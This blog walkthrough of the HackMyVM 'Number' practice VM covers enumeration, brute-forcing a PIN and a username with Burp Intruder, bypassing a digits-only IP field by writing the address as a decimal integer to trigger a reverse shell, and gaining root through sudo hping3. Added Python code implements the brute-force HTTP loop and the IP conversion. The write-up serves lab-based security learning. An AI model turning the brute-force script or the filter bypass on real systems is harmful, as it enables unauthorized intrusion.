HackMyVM Number Walkthrough

by Vince
in Blog

Another cyber range appeared recently. It's similar to Vulnhub, where people upload VMs, you download them, and you go after the flags. There's a points system like TryHackMe and HackTheBox, which is a great way to gamify the environment. I was curious to play, so I downloaded Number.

The box has no description other than its difficulty rating: Medium.

We kick off with Nmap:



We find a web port.  Enumerating with Nikto:


Then with GoBuster:



We find a login:



But after a few seconds of looking around, I feel like something is missing. We check out /pin:



We capture a request in Burp and we send it to Intruder:



Using Sniper, we'll attempt to brute force the pin:



Using seq -w 0000 4444, I create a list of numbers for our brute force (the -w flag pads every value to the same width, so 0 comes out as 0000 rather than 0):



Adding in the error message as a grep match, so any response that does not contain it stands out:


 
After a few seconds (Burp Pro, so no throttling), we learn the pin is 4444:



We go back to the pin page and enter our pin:



That doesn't help us:



We move back to Sniper thinking that 4444 is our password:



I'm just using a subset of RockYou as my wordlist; I think it's about 100k lines:



Entering the error message:



After a bit, we uncover the username: melon
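The two Intruder runs above are the same Sniper loop twice: one payload position, a fixed set of other fields, and success defined as the first response that does not contain the failure message. The Python below is an added example of that logic (not from the post, and not the Burp configuration shown in the screenshots). The URL, the form field names (`pin`, `username`, `password`) and the error strings are assumptions, since the post does not show the request bodies; the `fake_probe` is a constructed stand-in for the target so the block runs offline.

```python
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, Optional


def pin_candidates(width: int = 4, stop: int = 4444) -> Iterable[str]:
    """Zero-padded numeric candidates, equivalent to `seq -w 0000 4444`."""
    for n in range(stop + 1):
        yield f"{n:0{width}d}"


def http_probe(url: str, field: str, fixed: Optional[Dict[str, str]] = None) -> Callable[[str], str]:
    """Build a probe that POSTs one candidate in `field`, keeping `fixed` fields
    constant (e.g. password=4444 while brute-forcing the username), and returns
    the response body. Field names and URL are assumptions, not the post's."""
    fixed = dict(fixed or {})

    def probe(candidate: str) -> str:
        data = urllib.parse.urlencode({**fixed, field: candidate}).encode()
        req = urllib.request.Request(url, data=data, method="POST")
        try:
            with urllib.request.urlopen(req, timeout=5) as resp:
                return resp.read().decode(errors="replace")
        except urllib.error.HTTPError as e:
            # A 401/403 on a bad guess still carries the body we need to inspect.
            return e.read().decode(errors="replace")

    return probe


def sniper(candidates: Iterable[str], probe: Callable[[str], str], error_marker: str) -> Optional[str]:
    """Intruder 'Sniper' semantics: try each candidate in the single payload
    position and return the first one whose response lacks the error marker.
    Anything unusual (rate limit page, 500) is also flagged, which is why the
    post verifies the hit by hand afterwards."""
    for candidate in candidates:
        if error_marker not in probe(candidate):
            return candidate
    return None


# Constructed stand-in for the target: rejects everything except one PIN.
def fake_probe(candidate: str) -> str:
    return "Welcome" if candidate == "4444" else "Invalid PIN"


def run_pin_phase(probe: Callable[[str], str] = fake_probe) -> Optional[str]:
    return sniper(pin_candidates(), probe, "Invalid PIN")


def run_user_phase(wordlist: Iterable[str], probe: Callable[[str], str], error_marker: str) -> Optional[str]:
    """Second phase from the post: password fixed to 4444, username is the payload."""
    return sniper(wordlist, probe, error_marker)


if __name__ == "__main__":
    print("PIN:", run_pin_phase())
    # Real use (assumed URL/fields): sniper(pin_candidates(),
    #     http_probe("http://target/pin", "pin"), "Invalid PIN")
    # and then sniper(open("rockyou-subset.txt"),
    #     http_probe("http://target/login", "username", {"password": "4444"}),
    #     "Login failed")
```

The detection is by absence of the failure string rather than presence of a success string, exactly as in Burp's negative grep match; that is cheaper to set up but means any anomalous response (lockout page, server error) also surfaces, so a hit should be confirmed manually before building on it.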



Back to the login:



We are then presented with yet another form:



We enter an IP address, but the field only accepts digits:



Just a quick sanity check:



It accepts digits but not dots, so a dotted-quad address is rejected outright. The same address can be written as a single 32-bit integer, which is all digits, so we convert the IP to decimal:
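The conversion, as an added example not taken from the post: a dotted quad is four bytes, and the decimal form is just those bytes read as one big-endian 32-bit number. The address used here is a constructed placeholder, not the author's attacking machine, and the digits-only regex is an assumption about what the form enforces.

```python
import ipaddress
import re

# Constructed placeholder for the attacking machine (assumption; not the post's address).
ATTACKER_IP = "192.168.56.101"

# Assumed filter: the form in the post only accepts a run of digits.
DIGITS_ONLY = re.compile(r"[0-9]+")


def ip_to_decimal(dotted: str) -> int:
    """Dotted quad -> 32-bit integer, e.g. 192.168.56.101 -> 3232249957."""
    return int(ipaddress.IPv4Address(dotted))


def ip_to_decimal_manual(dotted: str) -> int:
    """Same thing by hand, to show the arithmetic: a*2^24 + b*2^16 + c*2^8 + d."""
    a, b, c, d = (int(octet) for octet in dotted.split("."))
    for octet in (a, b, c, d):
        if not 0 <= octet <= 255:
            raise ValueError(f"octet out of range in {dotted}")
    return (a << 24) | (b << 16) | (c << 8) | d


def decimal_to_ip(value: int) -> str:
    """Reverse direction, useful for confirming what the target will connect to."""
    return str(ipaddress.IPv4Address(value))


def passes_digit_filter(text: str) -> bool:
    """Would this string survive the form's digits-only check?"""
    return DIGITS_ONLY.fullmatch(text) is not None


if __name__ == "__main__":
    dec = ip_to_decimal(ATTACKER_IP)
    print(ATTACKER_IP, "->", dec, "(all digits:", passes_digit_filter(str(dec)), ")")
    print(dec, "->", decimal_to_ip(dec))
```

The integer form works against the target because the C `inet_aton`/`inet_addr` family, which most tools use to parse the address they are handed, accepts a single number as the whole 32-bit address (`ping 3232249957` reaches 192.168.56.101). The same parser also takes octal octets, so if a filter ever rejected large numbers, `030052034145` is another all-digit spelling of the same address.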



I enter the decimal equivalent of my attacking machine:



Since the form spawns a reverse shell back to the address we supplied, I set up tcpdump to see which port it connects to:



When we hit submit, we see an inbound connection on the familiar 4444. We set up a handler:



After we submit again, we catch a shell. After cleaning it up, we enter the melon home directory and find:



When we cat flag.sh, we find:



This won't work for us since we're not the user melon. Since we can't SSH in, I assume the password must be something simple.



You can read the flag at this point without using the script. Checking sudo privileges:



hping3 can drop to a shell from its interactive prompt, so running it through sudo gets us root. We elevate using hping3 and have only one thing left to do: